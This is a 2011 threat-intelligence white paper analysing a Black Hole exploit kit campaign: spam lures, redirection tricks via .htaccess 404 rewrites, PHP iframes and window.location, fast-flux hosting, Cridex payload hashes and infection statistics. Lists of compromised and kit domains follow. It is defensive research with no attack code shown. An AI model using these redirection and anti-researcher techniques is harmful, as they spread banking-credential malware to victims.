Exploring the Black Hole Exploit Kit
|
|
- Dominick Sparks
- 8 years ago
- Views:
Transcription
1 Exploring the Black Hole Exploit Kit Updated December 20, 2011 Internet Identity Threat Intelligence Department /29/11 Page 1/20
2 Summary The Black Hole exploit kit is a web application designed to propagate and monitor malware. The kit provides administrative features that allow operators to monitor infection statistics in real time, as well as toolsets to configure landing pages and repack malicious payloads to avoid antivirus detection. Typically, through means such as spam, victims are lured to malicious or compromised websites, from which Black Hole launches a variety of attacks on common web browser vulnerabilities found in Java, Adobe Reader, and Flash plugins. The Threat Intel team gained access to and monitored a Black Hole kit operating in the wild. Through the kit s administration panel, analysts identified the referrers distributed via spam s, the landing pages used to initiate the exploits, and the malicious binaries dropped onto victim machines. 1 This white paper summarizes the findings. 1 The Black Hole exploit kit labels URLs that redirect to malicious as referers 12/29/11 Page 2/20
3 Forum Activity The user Legacy on the forum Damagelab.org advertised the original version of the Black Hole Exploit Kit v beta on 02 September Legacy listed three individuals for potential clients to contact: Sales: Legacy, ICQ Program Support: Paunch, ICQ Team Lead: Naron, ICQ Figure 1 - Legacy's original post announcing release of Black Hole exploit kit Unlike other exploit kits, the source code for Black Hole is not for sale. Instead, potential clients have the option to lease the kit by purchasing different licenses ranging from $1,500 for one year, $1,000 for six months, or $700 for three months. It is also possible to rent the kit hosted on the author s server for a monthly fee of $500, or per week at $200. The Black Hole exploit kit has seen multiple updates since its original release. In a post dated 30 November 2011 on the forum Exploit.in, the user Paunch announced the most recent release v Figure 2 - Paunch announcing the latest updates to BH Kit (Java Rhino exploit among others) 12/29/11 Page 3/20
4 Spam All lures observed were initially sent out in spam campaigns generated by the Cutwail botnet. Each spam message contained a URL that lead to a compromised webpage. Said URLs are called redirectors or referers. We observed three different redirection techniques that lead to this particular Black Hole exploit kit: 1).htaccess 404 re- write 2) PHP script that loads iframe 3) JavaScript function evals to window.location redirect.htaccess 404 re- write Using an.htaccess re- write technique, the criminal is able append malicious JavaScript code to the 404 response page of the server. Said code writes an iframe to the page, which tells the browser to load the exploit kit. The benefit of this technique is that the attacker has an infinite number of URL combinations they can use, since every 404 response from the hacked website will return the appended JavaScript. More information and examples of an infected.htaccess file can be found on the Sucuri Blog. 2 Figure page with malicious JavaScript appended 2.htaccess info: htaccess- attacks- part- 1.html 12/29/11 Page 4/20
5 Two distinct campaigns one impersonating Bank of America and the other the IRS were observed using the.htaccess 404 re- write technique. 3 In the Bank of America spam campaign, s appeared to be sent from alert < .alert@bankofamerica.com>'. Listed below are examples of the subject headers observed: Bank of America: Account CLOSED Bank of America: Action required Bank of America: Account CLOSED Bank of America: Bill Payment CANCELED Bank of America: Unauthorized charges Figure 4 - Bank of America lure 3 StopMalvertising.com analysis of the Bank of America spam campaign: scams/bank- of- america- account- alert- leads- to- blackhole- exploit- kit.html 12/29/11 Page 5/20
6 In this attack, the lures contained links to non- existent PDF files on the server: hxxp://aracelektronik.com/8239epeoiq88534.pdf hxxp://brandonwjohnson.com/8239epeoiq89534.pdf hxxp://dafitson.com/8239epeoiq89534.pdf hxxp://easterncuisinewales.com/8238epeoiq89534.pdf hxxp://guiameloncorp.com/8239epeoiq89634.pdf hxxp://kismetindianrestaurant.co.uk/82e9epeoiq89534.pdf hxxp://masteryao.com/8239epeoiq89534.pdf hxxp://nicksvac.com/8289epeoiq89534.pdf hxxp://sanseverocommunity.com/8239epeoiq89584.pdf hxxp://thewebsitedesignpeople.co.uk/3239epeoiq86534.pdf hxxp:// By design, the server then returned an altered 404 page containing the obfuscated JavaScript, which then eval ed to an iframe in the browser: Figure 5 - Deobfuscated JavaScript with an iframe to exploit page 12/29/11 Page 6/20
7 The IRS themed campaign functions in almost the exact same manner. Below is an example of one such with the subject IRS: Fraud Alert : Figure 6 - IRS themed lure This campaign utilized hundreds of compromised domains as lures, including but not limited to: hxxp://davidenocera.altervista.org/irsgov/reports/complaint/66n704bvvof hxxp://de.yachtexport.com.pl/irsgov/reports/complaint/66n704bvvof hxxp://digofone.com/irsgov/reports/complaint/65dhwptnb49s hxxp://foto1.hu/irsgov/reports/complaint/66n704bvvof hxxp://freebusinesscardtemplates.com.au/irsgov/reports/complaint/3rfhpmxubgib98 hxxp://freshmodels.pl/irsgov/reports/complaint/66n704hj399 hxxp://galadhwen.com/irsgov/reports/complaint/4d5623a04sf3 hxxp://gruppoaversente.it/irsgov/reports/complaint/no304ind893 hxxp://gruppoaversente.it/irsgov/reports/complaint/vad5nhv6w3doh hxxp://helyitermek.com/irsgov/reports/complaint/kl0929naike9 hxxp://hostelinflorence.com/irsgov/reports/complaint/f35704bvvof 12/29/11 Page 7/20
8 Below are Black Hole campaigns associated with this technique: Campaign dbfe c 502c1fba e 502c1fba e Black Hole URL koiwoeqwcut.com/main.php?page=dbfe c domainsecurityvultest.in/main.php?page=502c1fba e www123.pandasecuritycheck.com/main.php?page=502c1fba e dbfe c was impersonating Bank of America and 502c1fba e was IRS themed. PHP Script to iframe In the second technique, malicious PHP scripts were placed on compromised websites. While no spam samples were identified, the administration panel of the Black Hole exploit kit showed the following lures: hxxp://fnrtop.com/adinfo.php hxxp://lomaintech.com/adinfo.php hxxp://rawmercurymedia.com/adinfo.php hxxp://rendermode.com/adinfo.php hxxp://paradisewebhost.com/adinfo.php The following HTML code (an iframe to the Black Hole kit) loads into the browser of victims that click on one of the above URLs: Figure 7 - Response content of adinfo.php redirector Below are the Black Hole campaigns associated with this technique: Campaign Domain 68dfc2dfc10659c4 statistic- countervisitors.net/main.php?page=68dfc2dfc10659c4 c f49d07 statistic- countervisitors.com/main.php?page=c f49d07 dfb886473afec374 usa- server05.com/main.php?page=dfb886473afec abda media- googlestat743.com/main.php?page=095252abda ae5b527f10c01793 media- googlestat743.net/main.php?page=ae5b527f10c /29/11 Page 8/20
9 window.location Redirect The third technique, known as the window.location redirect, utilized hundreds of compromised domains as redirectors contained in a variety of spam s. Many of the domains were also used in other spam campaigns as hosting platforms for other redirectors. Below is a personalized spam sample sent on 07 December 2011: Figure 8 - Spam sample from December 7th All personally identifiable information has been blotted out of the screenshot. Redirectors had the following format: hxxp://domain.tld/invoiceid- [0-9]{5}.html hxxp://bgoharbin.com/invoiceid html hxxp://capital- humain.ca/invoiceid html hxxp://neikiddo.com/invoiceid html 12/29/11 Page 9/20
10 Another wave of s, sent December 13 th, contained subject lines like New Agreement for our group duo December 2nd 2011." 4 The redirectors had the following format: Z]{8}.html hxxp://bellomo.de/njai6evm.html hxxp://inmemoriam40-45.nl/ffcacg8g.html hxxp://dvat.doggen- vom- alten- traum.de/e33b1h21.html hxxp://curricolo.istruzioneferrara.it/ v.html hxxp://admin.youmks.cba.pl/0j1mf9zd.html hxxp://curricolo.istruzioneferrara.it/m57qr6mu.html The html pages contained obfuscated JavaScript that loaded the Black Hole kit using the window.location object. Figure 9 - JavaScript function returned by hacked page 4 Reference to lure on Dynamoo s Blog: logs- spam.html 12/29/11 Page 10/20
11 The browser eval s this JavaScript to the following: Figure 10 - window.location redirect code The Black Hole campaigns associated with this technique: Campaign 68dfc2dfc10659c4 68dfc2dfc10659c abda Domain cms- wideopendns.com/main.php?page=68dfc2dfc10659c4 domainsecurityvultest.in/main.php?page=68dfc2dfc10659c4 checkmeforsecuryty.in/main.php?page=095252abda Current status of the Black Hole domains Domain First Seen (PST) Current Status media- googlestat743.net 12/5/11 17:19 SERVFAIL statistic- countervisitors.com 12/5/11 18:06 SERVFAIL statistic- countervisitors.net 12/7/11 1:55 SERVFAIL usa- server05.com 12/7/11 4:51 SERVFAIL media- googlestat743.com 12/7/11 10:09 NXDOMAIN koiwoeqwcut.com 12/8/11 15:09 SERVFAIL checkmeforsecuryty.in 12/12/11 8:11 SERVFAIL domainsecurityvultest.in 12/13/11 1:51 NOERROR 5 cms- wideopendns.com 12/13/11 13:19 SERVFAIL www123.pandasecuritycheck.com 12/14/11 9:39 NOERROR yourpandasecuritycheck.com 12/16/11 2:56:51 NOERROR 5 domainsecurityvultest.in is suspended status is CLIENT HOLD. The domain utilizes the nameserver ns1.suspended- domain.com. 12/29/11 Page 11/20
12 Black Hole exploit kit Infrastructure Analysis confirmed that this Black Hole kit was hosted at a fast- flux bullet- proof hosting provider. The short TTL, multiple A records, and distributed nameservers are indicators of a fast- flux botnet. A passive DNS lookup revealed 95 unique IPs for the month of December Figure 11 - Query results from the authoritative nameserver Figure 12 - Query results from our passive DNS database 12/29/11 Page 12/20
13 Six of the 95 IPs at were randomly selected for closer analysis: IP Hostname Country ASN ISP hdn1.deu.da.uu.net DE 702 Verizon Deutschland pcs.intercable.net MX Television Internacional dynamicip.rima- tde.net ES 3352 Telefonica España cpe.net.cable.rogers.com CA 812 Rogers Cable pool.mediaways.net DE 6805 Telefonica o2 Deutschland cm telecable.es ES TeleCable All of the IPs are residential broadband accounts spread across the globe, strong indicators of a botnet. The evidence clearly shows that the Black Hole kit is hosted behind a fast- flux botnet. In short, the Black Hole kit is hiding behind a botnet of proxy servers, but the proxy servers are all infected computers. The diagram below shows how the whole operation works. Note that the Black Hole exploit kit sits on criminal server behind the fast- flux proxy network. Figure 13: Infrastructure of the Black Hole exploit kit 12/29/11 Page 13/20
14 Malware (Payloads) Analysis shows that all but one of the samples listed above are the same binary slightly altered by basic packer obfuscation. These binaries are all variants of the Cridex trojan. 67 MD5 DESCRIPTION FIRST SEEN VT SCORE bf391e746529f4f87098a20f1 Cridex 12/13 1/ ecbf563d13cccbc8cc6de0d9 Cridex 12/12 5/ d1dee4c981b64fb9342a66ba81bb Cridex 12/7 2/43 27e403df66918fbbd bacd8492 Cridex 12/6 22/43 8ff7ab0264af8ce3d551a4924d Cridex 12/5 4/43 d41d8cd98f00b204e ecf8427e Empty file 12/5 NA Figure 14 - Some of the malware samples dropped 6 The Cridex trojan is a keylogger designed to obtain victim banking credentials. 7 nov- 11- cridex- the- hex- of- skidlo.aspx 12/29/11 Page 14/20
15 Anti- White Hat Techniques The criminals operating this Black Hole kit made considerable efforts to protect their investment and maximize efficiency of their operation. They opted to host their exploit kit at a fast- flux botnet hosting provider in order to hide their exploit kit behind a proxy network (see Figure 15). Also, they are blocking IPs and referers that they believe are used by white hat researchers to track malware systems. The blocking mechanism appears to be block directives in the.htaccess config, however, this functionality is built directly into the Black Hole admin panel: Figure 15 Black List 12/29/11 Page 15/20
16 Statistics This section provides a glimpse into the Black Hole control panel from the vantage point of the criminal operators. Country Statistics Analysis of the statistics confirmed that the criminal actors were targeting only the United States, Germany, and Italy. Though it appears that the primary focus was victims in the United States. Figure 16 - Statistics based on country For clarification, the first column is country, the second column is hits, the third column is successful exploits, and the fourth column is successful infections. 12/29/11 Page 16/20
17 Exploit Statistics The most commonly used exploit is the newly added Java Rhino exploit [CVE ]. This exploit will work on all browsers and across every operating system. Browser Statistics Figure 17 - Exploit statistics There were many successful exploits of Safari and Chrome, but no successful malware installs. The most vulnerable browser is Firefox with a 60% exploit rate, followed by Internet Explorer with a 40% exploit rate. Figure 18 - Browser statistics 12/29/11 Page 17/20
18 Operating System Statistics The statistics panel shows that the most vulnerable and prevalent operating system is Windows XP. Overall Statistics Figure 19 - Operating system statistics The overall statistics section shows the total number of hosts infected by this Black Hole exploit kit. Figure 20 - Overall statistics 12/29/11 Page 18/20
19 Post- Exploit Traffic Direction After the exploit code is run, users are forwarded to the following domains: commercialday- net.com jdemponedelnik.bij.pl commercialday- net.com is suspended (domain status CLIENT HOLD ) and jdemponedelnik.bij.pl appears to redirect to an Incognito exploit kit. The purpose of this traffic direction is unclear. Figure 21 - Campaign monitoring page 12/29/11 Page 19/20
20 Administrator Connections Administrator connections to the exploit kit admin panel were established from the following IPs: IP COUNTRY HOSTNAME ISP US server80.it4business.ca PEER US dns2.raymondvilleisd.org VTXC NL N/A LEASEWEB US N/A NTT DE evrohoster.com LEASEWEB US 8a.7.be.static.xlhost.com XLHOST.COM DE N/A LEASEWEB MD starnet.md STARNET NL local DEDISERV GB N/A RACKSRV Most of these IPs appear to be VPS or VPN servers. 12/29/11 Page 20/20
Blackhole Exploit Kit: A Spam Campaign, Not a Series of Individual Spam Runs AN IN-DEPTH ANALYSIS
Trend Micro Incorporated Research Paper 2012 Blackhole Exploit Kit: A Spam Campaign, Not a Series of Individual Spam Runs AN IN-DEPTH ANALYSIS By: Jon Oliver, Sandra Cheng, Lala Manly, Joey Zhu, Roland
More informationDeciphering and Mitigating Blackhole Spam from Email-borne Threats
Deciphering and Mitigating Blackhole Spam from Email-borne Threats Samir Patil Symantec Deciphering and Mitigating Blackhole Spam from Email-borne Threats 1 Outline 1 Background 2 Detection Challenges
More informationMalware B-Z: Inside the Threat From Blackhole to ZeroAccess
Malware B-Z: Inside the Threat From Blackhole to ZeroAccess By Richard Wang, Manager, SophosLabs U.S. Over the last few years the volume of malware has grown dramatically, thanks mostly to automation and
More informationOperation Liberpy : Keyloggers and information theft in Latin America
Operation Liberpy : Keyloggers and information theft in Latin America Diego Pérez Magallanes Malware Analyst Pablo Ramos HEAD of LATAM Research Lab 7/7/2015 version 1.1 Contents Introduction... 3 Operation
More informationWeb Application Worms & Browser Insecurity
Web Application Worms & Browser Insecurity Mike Shema Welcome Background Hacking Exposed: Web Applications The Anti-Hacker Toolkit Hack Notes: Web Security Currently working at Qualys
More informationQUARTERLY REPORT 2015 INFOBLOX DNS THREAT INDEX POWERED BY
QUARTERLY REPORT 2015 INFOBLOX DNS THREAT INDEX POWERED BY EXPLOIT KITS UP 75 PERCENT The Infoblox DNS Threat Index, powered by IID, stood at 122 in the third quarter of 2015, with exploit kits up 75 percent
More informationWEB ATTACKS AND COUNTERMEASURES
WEB ATTACKS AND COUNTERMEASURES February 2008 The Government of the Hong Kong Special Administrative Region The contents of this document remain the property of, and may not be reproduced in whole or in
More informationAdvancements in Botnet Attacks and Malware Distribution
Advancements in Botnet Attacks and Malware Distribution HOPE Conference, New York, July 2012 Aditya K Sood Rohit Bansal Richard J Enbody SecNiche Security Department of Computer Science and Engineering
More informationPhishing Activity Trends Report June, 2006
Phishing Activity Trends Report, 26 Phishing is a form of online identity theft that employs both social engineering and technical subterfuge to steal consumers' personal identity data and financial account
More informationMalicious Websites uncover vulnerabilities (browser, plugins, webapp, server), initiate attack steal sensitive information, install malware, compromise victim s machine Malicious Websites uncover vulnerabilities
More informationINFORMATION SECURITY REVIEW
INFORMATION SECURITY REVIEW 14.10.2008 CERT-FI Information Security Review 3/2008 In the summer, information about a vulnerability in the internet domain name service (DNS) was released. If left unpatched,
More informationAnalysis of the Australian Web Threat Landscape Christopher Ke, Jonathan Oliver and Yang Xiang
Analysis of the Australian Web Threat Landscape Christopher Ke, Jonathan Oliver and Yang Xiang Deakin University, 221 Burwood Highway, Burwood, Victoria 3125, Australia Trend Micro 606 St Kilda Road, Melbourne,
More informationThreat Spotlight: Angler Lurking in the Domain Shadows
White Paper Threat Spotlight: Angler Lurking in the Domain Shadows Over the last several months Talos researchers have been monitoring a massive exploit kit campaign that is utilizing hijacked registrant
More informationPhishing Activity Trends
Phishing Activity Trends Report for the Month of, 27 Summarization of Report Findings The number of phishing reports received by the (APWG) came to 23,61 in, a drop of over 6, from January s previous record
More informationDRIVE-BY DOWNLOAD WHAT IS DRIVE-BY DOWNLOAD? A Typical Attack Scenario
DRIVE-BY DOWNLOAD WHAT IS DRIVE-BY DOWNLOAD? Drive-by Downloads are a common technique used by attackers to silently install malware on a victim s computer. Once a target website has been weaponized with
More informationSurviving and operating services despite highly skilled and well-funded organised crime groups. Romain Wartel, CERN CHEP 2015, Okinawa
Surviving and operating services despite highly skilled and well-funded organised crime groups Romain Wartel, CERN CHEP 2015, Okinawa 1 Operation Windigo (2011 - now) 30,000+ unique servers compromised
More informationCybercrime myths, challenges and how to protect our business. Vladimir Kantchev Managing Partner Service Centrix
Cybercrime myths, challenges and how to protect our business Vladimir Kantchev Managing Partner Service Centrix Agenda Cybercrime today Sources and destinations of the attacks Breach techniques How to
More informationTHREAT VISIBILITY & VULNERABILITY ASSESSMENT
THREAT VISIBILITY & VULNERABILITY ASSESSMENT Date: April 15, 2015 IKANOW Analysts: Casey Pence IKANOW Platform Build: 1.34 11921 Freedom Drive, Reston, VA 20190 IKANOW.com TABLE OF CONTENTS 1 Key Findings
More informationPhishing Activity Trends Report for the Month of December, 2007
Phishing Activity Trends Report for the Month of December, 2007 Summarization of December Report Findings The total number of unique phishing reports submitted to APWG in December 2007 was 25,683, a decrease
More informationBe Prepared for Java Zero-day Attacks
Threat Report Be Prepared for Java Zero-day Attacks Malware Analysis: Malicious Codes spread via cloud-based data storage services December 19, 2013 Content Overview... 3 Distributing Malicious E-mails
More informationMalware & Botnets. Botnets
- 2 - Malware & Botnets The Internet is a powerful and useful tool, but in the same way that you shouldn t drive without buckling your seat belt or ride a bike without a helmet, you shouldn t venture online
More informationSandy. The Malicious Exploit Analysis. http://exploit-analysis.com/ Static Analysis and Dynamic exploit analysis. Garage4Hackers
Sandy The Malicious Exploit Analysis. http://exploit-analysis.com/ Static Analysis and Dynamic exploit analysis About Me! I work as a Researcher for a Global Threat Research firm.! Spoke at the few security
More informationTECHNICAL REPORT. An Analysis of Domain Silver, Inc..pl Domains
TECHNICAL REPORT An Analysis of Domain Silver, Inc..pl Domains July 31, 2013 CONTENTS Contents 1 Introduction 2 2 Registry, registrar and registrant 3 2.1 Rogue registrar..................................
More informationRIA SECURITY TECHNOLOGY
RIA SECURITY TECHNOLOGY Ulysses Wang Security Researcher, Websense Hermes Li Security Researcher, Websense 2009 Websense, Inc. All rights reserved. Agenda RIA Introduction Flash Security Attack Vectors
More informationA Server and Browser-Transparent CSRF Defense for Web 2.0 Applications. Slides by Connor Schnaith
A Server and Browser-Transparent CSRF Defense for Web 2.0 Applications Slides by Connor Schnaith Cross-Site Request Forgery One-click attack, session riding Recorded since 2001 Fourth out of top 25 most
More informationCross Site Scripting in Joomla Acajoom Component
Whitepaper Cross Site Scripting in Joomla Acajoom Component Vandan Joshi December 2011 TABLE OF CONTENTS Abstract... 3 Introduction... 3 A Likely Scenario... 5 The Exploit... 9 The Impact... 12 Recommended
More informationUsing big data analytics to identify malicious content: a case study on spam emails
Using big data analytics to identify malicious content: a case study on spam emails Mamoun Alazab & Roderic Broadhurst Mamoun.alazab@anu.edu.au http://cybercrime.anu.edu.au 2 Outline Background Cybercrime
More information4/20/2015. Fraud Watch Campaign. AARP is Fighting for You. AARP is Fighting for You. Campaign Tactics. AARP can help you Spot & Report Fraud
AARP can help you Spot & Report Fraud Fraud Fighter Call Center: Talk to a volunteer trained in how to spot and report fraud. Call the Fraud Fighter Call Center at (877) 908-3360 Fraud Watch Campaign What
More informationEyjafjallajöKull Framework (aka: Exploit Kits Krawler Framework)
EyjafjallajöKull Framework (aka: Exploit Kits Krawler Framework) Seeking Exploit Kits at Large Scale Made Easy By Sébastien Larinier / @Sebdraven & Guillaume Arcas / @y0m This Slide Intentionally Left
More informationDetecting and Exploiting XSS with Xenotix XSS Exploit Framework
Detecting and Exploiting XSS with Xenotix XSS Exploit Framework ajin25@gmail.com keralacyberforce.in Introduction Cross Site Scripting or XSS vulnerabilities have been reported and exploited since 1990s.
More informationPractical Threat Intelligence. with Bromium LAVA
Practical Threat Intelligence with Bromium LAVA Practical Threat Intelligence Executive Summary Threat intelligence today is costly and time consuming and does not always result in a reduction of successful
More informationGlobalSign Malware Monitoring
GLOBALSIGN WHITE PAPER GlobalSign Malware Monitoring Protecting your website from distributing hidden malware GLOBALSIGN WHITE PAPER www.globalsign.com CONTENTS Introduction... 2 Malware Monitoring...
More informationWompMobile Technical FAQ
WompMobile Technical FAQ What are the technical benefits of WompMobile? The mobile site has the same exact URL as the desktop website. The mobile site automatically and instantly syncs with the desktop
More informationComprehensive Malware Detection with SecurityCenter Continuous View and Nessus. February 3, 2015 (Revision 4)
Comprehensive Malware Detection with SecurityCenter Continuous View and Nessus February 3, 2015 (Revision 4) Table of Contents Overview... 3 Malware, Botnet Detection, and Anti-Virus Auditing... 3 Malware
More informationConfiguring an External Domain
Configuring an External Domain SUPPORT GUIDE DOMAINS ABOUT THIS GUIDE This guide will instruct you on how to: Use an existing domain name Set Up Your Domain to Use Tagadab Name Servers Use Your VPS/Dedicated
More informationN J C C I C NJ CYBERSECURITY AND COMMUNICATIONS INTEGRATION CELL
4 N J C C I C NJ CYBERSECURITY AND COMMUNICATIONS INTEGRATION CELL Exploit Kits: A Prevailing Vector for Malware Distribution August 5, 2015 Since first appearing around 2006, exploit kits (EK) have evolved
More informationLASTLINE WHITEPAPER. Using Passive DNS Analysis to Automatically Detect Malicious Domains
LASTLINE WHITEPAPER Using Passive DNS Analysis to Automatically Detect Malicious Domains Abstract The domain name service (DNS) plays an important role in the operation of the Internet, providing a two-way
More informationMeasures to Protect (University) Domain Registrations and DNS Against Attacks. Dave Piscitello, ICANN dave.piscitello@icann.org
Measures to Protect (University) Domain Registrations and DNS Against Attacks Dave Piscitello, ICANN dave.piscitello@icann.org Why are we talking about Domain names and DNS? Domain names and URLs define
More informationThe Dark Side of Trusting Web Searches From Blackhat SEO to System Infection
The Dark Side of Trusting Web Searches From Blackhat SEO to System Infection Trend Micro, Incorporated Marco Dela Vega and Norman Ingal Threat Response Engineers A Trend Micro Research Paper I November
More informationWHITEPAPER. How a DNS Firewall Helps in the Battle against Advanced Persistent Threat and Similar Malware
WHITEPAPER How a DNS Firewall Helps in the Battle against Advanced Persistent Threat and Similar Malware How a DNS Firewall Helps in the Battle against Advanced As more and more information becomes available
More informationwhite paper Malware Security and the Bottom Line
Malware Security Report: Protecting Your BusineSS, Customers, and the Bottom Line Contents 1 Malware is crawling onto web sites everywhere 1 What is Malware? 2 The anatomy of Malware attacks 3 The Malware
More informationStreamlining Web and Email Security
How to Protect Your Business from Malware, Phishing, and Cybercrime The SMB Security Series Streamlining Web and Email Security sponsored by Introduction to Realtime Publishers by Don Jones, Series Editor
More informationNetworks and Security Lab. Network Forensics
Networks and Security Lab Network Forensics Network Forensics - continued We start off from the previous week s exercises and analyze each trace file in detail. Tools needed: Wireshark and your favorite
More informationWhat do a banking Trojan, Chrome and a government mail server have in common? Analysis of a piece of Brazilian malware
What do a banking Trojan, Chrome and a government mail server have in common? Analysis of a piece of Brazilian malware Contents Introduction.................................2 Installation: Social engineering
More informationMALICIOUS REDIRECTION A Look at DNS-Changing Malware
MALICIOUS REDIRECTION A Look at DNS-Changing Malware What are Domain Naming System (DNS)-changing malware? These recently garnered a lot of attention due to the recent Esthost takedown that involved a
More informationDATA SHEET. What Darktrace Finds
DATA SHEET What Darktrace Finds Darktrace finds anomalies that bypass other security tools, due to the uniqueness of the Enterprise Immune System, capable of detecting threats without reliance on rules,
More informationRecommended Practice Case Study: Cross-Site Scripting. February 2007
Recommended Practice Case Study: Cross-Site Scripting February 2007 iii ACKNOWLEDGEMENT This document was developed for the U.S. Department of Homeland Security to provide guidance for control system cyber
More informationCS 558 Internet Systems and Technologies
CS 558 Internet Systems and Technologies Dimitris Deyannis deyannis@csd.uoc.gr 881 Heat seeking Honeypots: Design and Experience Abstract Compromised Web servers are used to perform many malicious activities.
More informationContext Threat Intelligence
Context Threat Intelligence Threat Advisory The Monju Incident Context Ref. Author TA10009 Context Threat Intelligence (CTI) Date 27/01/2014 Tel +44 (0) 20 7537 7515 Fax +44 (0) 20 7537 1071 Email threat@contextis.co.uk
More informationTespok Kenya icsirt: Enterprise Cyber Threat Attack Targets Report
Tespok Kenya icsirt: Enterprise Cyber Threat Attack Targets Report About this Report This report was compiled and published by the Tespok icsirt in partnership with the Serianu Cyber Threat Intelligence
More informationIntroduction The Case Study Technical Background The Underground Economy The Economic Model Discussion
Internet Security Seminar 2013 Introduction The Case Study Technical Background The Underground Economy The Economic Model Discussion An overview of the paper In-depth analysis of fake Antivirus companies
More informationPhishing Scams Security Update Best Practices for General User
Phishing Scams Security Update Best Practices for General User hishing refers to the malicious attack Pmethod by attackers who imitate legitimate companies in sending emails in order to entice people to
More informationDefend Your Network with DNS Defeat Malware and Botnet Infections with a DNS Firewall
Defeat Malware and Botnet Infections with a DNS Firewall By 2020, 30% of Global 2000 companies will have been directly compromised by an independent group of cyberactivists or cybercriminals. How to Select
More informationIndian Computer Emergency Response Team (CERT-In) Annual Report (2010)
Indian Computer Emergency Response Team (CERT-In) Annual Report (2010) Indian Computer Emergency Response Team (CERT-In) Department of Information Technology Ministry of Communications & Information Technology
More informationBeyond Aurora s Veil: A Vulnerable Tale
Beyond Aurora s Veil: A Vulnerable Tale Derek Manky Cyber Security & Threat Research FortiGuard Labs October 26th, 2010: SecTor 2010 Toronto, CA Conficker: April Doomsday.. Meanwhile JBIG2 Zero Day PDF/SWF
More informationA more comprehensive version of this material was published in the October issue of the Virus Bulletin magazine [3].
INSIDE A BLACK HOLE By Gabor Szappanos, Principal Researcher, SophosLabs Introduction Without exception the most actively deployed exploit kit in the past year was the Blackhole exploit kit. [1]. Now that
More informationMALWARE ANALYSIS 1. STYX EXPLOIT PACK: INSIDIOUS DESIGN Aditya K. Sood & Richard J. Enbody Michigan State University, USA COMMUNICATION DESIGN
MALWARE ANALYSIS 1 STYX EXPLOIT PACK: INSIDIOUS DESIGN Aditya K. Sood & Richard J. Enbody Michigan State University, USA Rohit Bansal Independent Security Researcher, India In this paper, we discuss the
More informationMicrosoft Security Intelligence Report
Microsoft Security Intelligence Report Volume 16 July through December, 2013 Key Findings Summary This document is for informational purposes only. MICROSOFT MAKES NO WARRANTIES, EXPRESS, IMPLIED, OR STATUTORY,
More informationProtect Your IT Infrastructure from Zero-Day Attacks and New Vulnerabilities
Protect Your IT Infrastructure from Zero-Day Attacks and New Vulnerabilities Protecting a business s IT infrastructure is complex. Take, for example, a retailer operating a standard multi-tier infrastructure
More informationKeeping Eyes on Malicious Websites ChkDeface against Fraudulent Sites
Keeping Eyes on Malicious Websites ChkDeface against Fraudulent Sites Hiroshi KOBAYASHI, Takayuki UCHIYAMA Japan Computer Emergency Response Team Coordination Center (JPCERT/CC) Agenda Background Increase
More informationWeb Tracking for You. Gregory Fleischer
Web Tracking for You Gregory Fleischer 1 INTRODUCTION 2 Me Gregory Fleischer Senior Security Consultant at FishNet Security 3 Disclaimer Why do you hate? 4 Reasons For Tracking TradiFonal reasons for tracking
More informationInternet Banking Attacks. Karel Miko, CISA DCIT, a.s. (Prague, Czech Republic) miko@dcit.cz
Internet Banking Attacks Karel Miko, CISA DCIT, a.s. (Prague, Czech Republic) miko@dcit.cz Contents Agenda Internet banking today The most common attack vectors The possible countermeasures What protection
More informationEndpoint Business Products Testing Report. Performed by AV-Test GmbH
Business Products Testing Report Performed by AV-Test GmbH January 2011 1 Business Products Testing Report - Performed by AV-Test GmbH Executive Summary Overview During November 2010, AV-Test performed
More informationOverview. Common Internet Threats. Spear Phishing / Whaling. Phishing Sites. Virus: Pentagon Attack. Viruses & Worms
Overview Common Internet Threats Tom Chothia Computer Security, Lecture 19 Phishing Sites Trojans, Worms, Viruses, Drive-bydownloads Net Fast Flux Domain Flux Infiltration of a Net Underground economy.
More informationBotnets Die Hard Owned and Operated
Botnets Die Hard Owned and Operated,,, Las Vegas, 2012 Aditya K Sood Richard J Enbody SecNiche Security Department of Computer Science and Engineering Michigan State University Aditya K Sood About Us PhD
More informationAWEBDESK LIVE CHAT SOFTWARE
AWEBDESK LIVE CHAT SOFTWARE Version 6.1.0 AwebDesk Softwares Administrator Guide Edition 1.0 November 2012 Page 1 TABLE OF CONTENTS Introduction.......... 3 Sign In as Admin...4 Admin Dashboard Overview.
More informationSpear Phishing Attacks Why They are Successful and How to Stop Them
White Paper Spear Phishing Attacks Why They are Successful and How to Stop Them Combating the Attack of Choice for Cybercriminals White Paper Contents Executive Summary 3 Introduction: The Rise of Spear
More informationWho Drives Cybersecurity in Your Business? Milan Patel, K2 Intelligence. AIBA Quarterly Meeting September 10, 2015
Who Drives Cybersecurity in Your Business? Milan Patel, K2 Intelligence AIBA Quarterly Meeting September 10, 2015 The Answer 2 Everyone The relationship between the board, C-suite, IT, and compliance leaders
More informationthriller INTERNET SECURITY
+ thriller INTERNET SECURITY Saturday, October 31, 2009 1:30 PM 3:00 PM Matthew 28:18-20 Website Ministry + Agenda 2 Scripture (Col 3:12-15) Prayer Internet Security Security Threats Security Protection
More informationZscaler Internet Security Frequently Asked Questions
Zscaler Internet Security Frequently Asked Questions 1 Technical FAQ PRODUCT LICENSING & PRICING How is Zscaler Internet Security Zscaler Internet Security is licensed on number of Cradlepoint devices
More informationMITB Grabbing Login Credentials
MITB Grabbing Login Credentials Original pre-login fields UID, password & site Modified pre-login fields Now with ATM details and MMN New fields added MITB malware inserted additional fields. Records them,
More informationSpam and All Things Salty: Spambot v2013
Spam and All Things Salty: Spambot v2013 Jessa dela Torre 1 and Sabrina Lei Sioting 2 1 Forward-Looking Threat Research Team 2 Threat Cleanup and Analysis Team Trend Micro, Inc., Philippines Abstract.
More informationhttp://my6.statcounter.com/project/standard/magnify.php?project_id=1613882&ip_number=3275864294
Pagina 1 di 8 My Projects My Profile Account Info Users Support Billing Upgrade User Forum Blog Logout [nicscics] Magnify User (Scie Chimiche (Chemtrails)) 16th December 2008 00:40:22 S T A T I S T I C
More informationSOLUTION CARD WHITE PAPER
WHITE PAPER Why Education is Among the Worst Affected Industries by Malware The Contradiction Between Perceived Anti-Virus Readiness and Actual Malware Infection Rates in the Education Industry About This
More informationInside Nuclear s Core: Analyzing the Nuclear Exploit Kit Infrastructure Part I
Inside Nuclear s Core: Analyzing the Nuclear Exploit Kit Infrastructure Part I By Check Point Threat Intelligence & Research Malware has different methods by which it propagates. Exploit kits (EKs) have
More informationFrom Georgia, with Love Win32/Georbot. Is someone trying to spy on Georgians?
